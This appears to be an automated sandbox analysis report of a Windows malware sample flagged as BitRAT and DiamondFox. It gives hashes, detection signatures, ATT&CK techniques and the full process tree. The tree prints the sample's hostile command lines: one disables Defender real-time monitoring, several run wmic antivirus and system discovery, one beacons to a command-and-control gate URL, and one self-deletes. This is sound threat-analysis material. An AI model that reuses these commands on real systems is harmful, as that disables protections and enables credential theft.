bitrat | 3ecf2f7b5f8f62572e6006aa6b0ad2c0b7df2bc1fc494f026608c2852113a187

Analysis

max time kernel
144s
max time network
151s
platform
windows7_x64
resource
win7v20210410
submitted
03-07-2021 23:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mixazed_20210703-205320.exe
Size

1.8MB
MD5

8703d31eadccffa270ba764a35dfd548
SHA1

6dd74fef8122095da64955abd99f38421629445d
SHA256

3ecf2f7b5f8f62572e6006aa6b0ad2c0b7df2bc1fc494f026608c2852113a187
SHA512

f8a878ca57208128dd2e9452ede5596aad819f2cab6d80fb71d7ea3baf1e6df540f28c000cbd64ecdd19e9fbb021ab03ea6050bc1f851a9524cf7d22ea4fd6a2

Score

10^/10

bitrat diamondfox botnet discovery spyware stealer trojan upx

Malware Config

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

BitRAT Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/772-71-0x00000000007E2730-mapping.dmp	family_bitrat

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 19 IoCs

Detects DiamondFox payload in file/memory.

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe	diamondfox
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe	diamondfox
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe	diamondfox
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe	diamondfox
C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe	diamondfox
C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe	diamondfox
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/1684-173-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView
behavioral1/memory/1684-174-0x000000000044412E-mapping.dmp	MailPassView
behavioral1/memory/1684-176-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/1132-156-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView
behavioral1/memory/1132-157-0x00000000004466F4-mapping.dmp	WebBrowserPassView
behavioral1/memory/1132-160-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1132-156-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/1132-157-0x00000000004466F4-mapping.dmp	Nirsoft
behavioral1/memory/1132-160-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/472-169-0x0000000000413E10-mapping.dmp	Nirsoft
behavioral1/memory/472-168-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral1/memory/472-172-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral1/memory/1684-173-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft
behavioral1/memory/1684-174-0x000000000044412E-mapping.dmp	Nirsoft
behavioral1/memory/1684-176-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft

Downloads MZ/PE file

Executes dropped EXE 10 IoCs

Processes:

sVQTwb6rts5kF2Qe.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exe

pid	process
828	sVQTwb6rts5kF2Qe.exe
844	MicrosoftEdgeCPS.exe
1132	MicrosoftEdgeCPS.exe
1276	MicrosoftEdgeCPS.exe
472	MicrosoftEdgeCPS.exe
1684	MicrosoftEdgeCPS.exe
1988	MicrosoftEdgeCPS.exe
1804	MicrosoftEdgeCPS.exe
1948	MicrosoftEdgeCPS.exe
1316	MicrosoftEdgeCPS.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/772-70-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/772-73-0x0000000000400000-0x00000000007E4000-memory.dmp	upx

Loads dropped DLL 7 IoCs

Processes:

mixazed_20210703-205320.exesVQTwb6rts5kF2Qe.exeMicrosoftEdgeCPS.exe

pid	process
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
828	sVQTwb6rts5kF2Qe.exe
828	sVQTwb6rts5kF2Qe.exe
844	MicrosoftEdgeCPS.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

mixazed_20210703-205320.exe

pid	process
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

mixazed_20210703-205320.exeMicrosoftEdgeCPS.exe

description	pid	process	target process
PID 2004 set thread context of 772	2004	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 844 set thread context of 1132	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 set thread context of 1276	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 set thread context of 472	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 set thread context of 1684	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 set thread context of 1988	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 set thread context of 1804	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 set thread context of 1948	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 set thread context of 1316	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

828 taskkill.exe
1640 taskkill.exe
1360 taskkill.exe
1160 taskkill.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1716 notepad.exe

pid	process
828	taskkill.exe
1640	taskkill.exe
1360	taskkill.exe
1160	taskkill.exe

pid	process
1716	notepad.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

mixazed_20210703-205320.exepowershell.exepowershell.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exe

pid	process
2004	mixazed_20210703-205320.exe
2004	mixazed_20210703-205320.exe
1588	powershell.exe
1188	powershell.exe
1188	powershell.exe
1588	powershell.exe
844	MicrosoftEdgeCPS.exe
1132	MicrosoftEdgeCPS.exe
1132	MicrosoftEdgeCPS.exe
844	MicrosoftEdgeCPS.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

mixazed_20210703-205320.exemixazed_20210703-205320.exepowershell.exepowershell.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	2004	mixazed_20210703-205320.exe
Token: SeDebugPrivilege	772	mixazed_20210703-205320.exe
Token: SeShutdownPrivilege	772	mixazed_20210703-205320.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	1188	powershell.exe
Token: SeIncreaseQuotaPrivilege	332	wmic.exe
Token: SeSecurityPrivilege	332	wmic.exe
Token: SeTakeOwnershipPrivilege	332	wmic.exe
Token: SeLoadDriverPrivilege	332	wmic.exe
Token: SeSystemProfilePrivilege	332	wmic.exe
Token: SeSystemtimePrivilege	332	wmic.exe
Token: SeProfSingleProcessPrivilege	332	wmic.exe
Token: SeIncBasePriorityPrivilege	332	wmic.exe
Token: SeCreatePagefilePrivilege	332	wmic.exe
Token: SeBackupPrivilege	332	wmic.exe
Token: SeRestorePrivilege	332	wmic.exe
Token: SeShutdownPrivilege	332	wmic.exe
Token: SeDebugPrivilege	332	wmic.exe
Token: SeSystemEnvironmentPrivilege	332	wmic.exe
Token: SeRemoteShutdownPrivilege	332	wmic.exe
Token: SeUndockPrivilege	332	wmic.exe
Token: SeManageVolumePrivilege	332	wmic.exe
Token: 33	332	wmic.exe
Token: 34	332	wmic.exe
Token: 35	332	wmic.exe
Token: SeIncreaseQuotaPrivilege	332	wmic.exe
Token: SeSecurityPrivilege	332	wmic.exe
Token: SeTakeOwnershipPrivilege	332	wmic.exe
Token: SeLoadDriverPrivilege	332	wmic.exe
Token: SeSystemProfilePrivilege	332	wmic.exe
Token: SeSystemtimePrivilege	332	wmic.exe
Token: SeProfSingleProcessPrivilege	332	wmic.exe
Token: SeIncBasePriorityPrivilege	332	wmic.exe
Token: SeCreatePagefilePrivilege	332	wmic.exe
Token: SeBackupPrivilege	332	wmic.exe
Token: SeRestorePrivilege	332	wmic.exe
Token: SeShutdownPrivilege	332	wmic.exe
Token: SeDebugPrivilege	332	wmic.exe
Token: SeSystemEnvironmentPrivilege	332	wmic.exe
Token: SeRemoteShutdownPrivilege	332	wmic.exe
Token: SeUndockPrivilege	332	wmic.exe
Token: SeManageVolumePrivilege	332	wmic.exe
Token: 33	332	wmic.exe
Token: 34	332	wmic.exe
Token: 35	332	wmic.exe
Token: SeIncreaseQuotaPrivilege	1148	wmic.exe
Token: SeSecurityPrivilege	1148	wmic.exe
Token: SeTakeOwnershipPrivilege	1148	wmic.exe
Token: SeLoadDriverPrivilege	1148	wmic.exe
Token: SeSystemProfilePrivilege	1148	wmic.exe
Token: SeSystemtimePrivilege	1148	wmic.exe
Token: SeProfSingleProcessPrivilege	1148	wmic.exe
Token: SeIncBasePriorityPrivilege	1148	wmic.exe
Token: SeCreatePagefilePrivilege	1148	wmic.exe
Token: SeBackupPrivilege	1148	wmic.exe
Token: SeRestorePrivilege	1148	wmic.exe
Token: SeShutdownPrivilege	1148	wmic.exe
Token: SeDebugPrivilege	1148	wmic.exe
Token: SeSystemEnvironmentPrivilege	1148	wmic.exe
Token: SeRemoteShutdownPrivilege	1148	wmic.exe
Token: SeUndockPrivilege	1148	wmic.exe
Token: SeManageVolumePrivilege	1148	wmic.exe
Token: 33	1148	wmic.exe
Token: 34	1148	wmic.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

mixazed_20210703-205320.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exe

pid process

772 mixazed_20210703-205320.exe
772 mixazed_20210703-205320.exe
1276 MicrosoftEdgeCPS.exe
1804 MicrosoftEdgeCPS.exe
1948 MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

mixazed_20210703-205320.exemixazed_20210703-205320.exesVQTwb6rts5kF2Qe.exeMicrosoftEdgeCPS.exe

description	pid	process	target process
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 772 wrote to memory of 828	772	mixazed_20210703-205320.exe	sVQTwb6rts5kF2Qe.exe
PID 772 wrote to memory of 828	772	mixazed_20210703-205320.exe	sVQTwb6rts5kF2Qe.exe
PID 772 wrote to memory of 828	772	mixazed_20210703-205320.exe	sVQTwb6rts5kF2Qe.exe
PID 772 wrote to memory of 828	772	mixazed_20210703-205320.exe	sVQTwb6rts5kF2Qe.exe
PID 828 wrote to memory of 844	828	sVQTwb6rts5kF2Qe.exe	MicrosoftEdgeCPS.exe
PID 828 wrote to memory of 844	828	sVQTwb6rts5kF2Qe.exe	MicrosoftEdgeCPS.exe
PID 828 wrote to memory of 844	828	sVQTwb6rts5kF2Qe.exe	MicrosoftEdgeCPS.exe
PID 828 wrote to memory of 844	828	sVQTwb6rts5kF2Qe.exe	MicrosoftEdgeCPS.exe
PID 828 wrote to memory of 1588	828	sVQTwb6rts5kF2Qe.exe	powershell.exe
PID 828 wrote to memory of 1588	828	sVQTwb6rts5kF2Qe.exe	powershell.exe
PID 828 wrote to memory of 1588	828	sVQTwb6rts5kF2Qe.exe	powershell.exe
PID 828 wrote to memory of 1588	828	sVQTwb6rts5kF2Qe.exe	powershell.exe
PID 844 wrote to memory of 1188	844	MicrosoftEdgeCPS.exe	powershell.exe
PID 844 wrote to memory of 1188	844	MicrosoftEdgeCPS.exe	powershell.exe
PID 844 wrote to memory of 1188	844	MicrosoftEdgeCPS.exe	powershell.exe
PID 844 wrote to memory of 1188	844	MicrosoftEdgeCPS.exe	powershell.exe
PID 844 wrote to memory of 332	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 332	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 332	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 332	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1148	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1148	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1148	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1148	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1684	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1684	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1684	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1684	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1360	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1360	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1360	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1360	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1784	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1784	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1784	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1784	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 536	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 536	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 536	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 536	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 432	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 432	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 432	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 432	844	MicrosoftEdgeCPS.exe	wmic.exe
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 wrote to memory of 1276	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 844 wrote to memory of 1276	844	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe

C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
"C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004

C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
2⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:772

C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe
"C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:828

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1188

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:332

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" os get caption /FORMAT:List
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1148

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_VideoController get caption /FORMAT:List
5⤵
PID:1684

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
5⤵
PID:1360

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
5⤵
PID:1784

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
5⤵
PID:536

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
5⤵
PID:432

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1132

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1276

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
5⤵
- Executes dropped EXE
PID:472

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
5⤵
- Executes dropped EXE
PID:1684

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
5⤵
- Executes dropped EXE
PID:1988

C:\Windows\notepad.exe
X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
6⤵
- Opens file in notepad (likely ransom note)
PID:1716

C:\Windows\write.exe
X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
6⤵
PID:1608

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1804

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1948

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
5⤵
- Executes dropped EXE
PID:1316

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
5⤵
PID:1336

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
5⤵
PID:1344

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /PID 1988 /F
5⤵
- Kills process with taskkill
PID:1640

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /PID 1804 /F
5⤵
- Kills process with taskkill
PID:1360

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /PID 1316 /F
5⤵
- Kills process with taskkill
PID:1160

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /PID 1948 /F
5⤵
- Kills process with taskkill
PID:828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe' -Force -Recurse
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
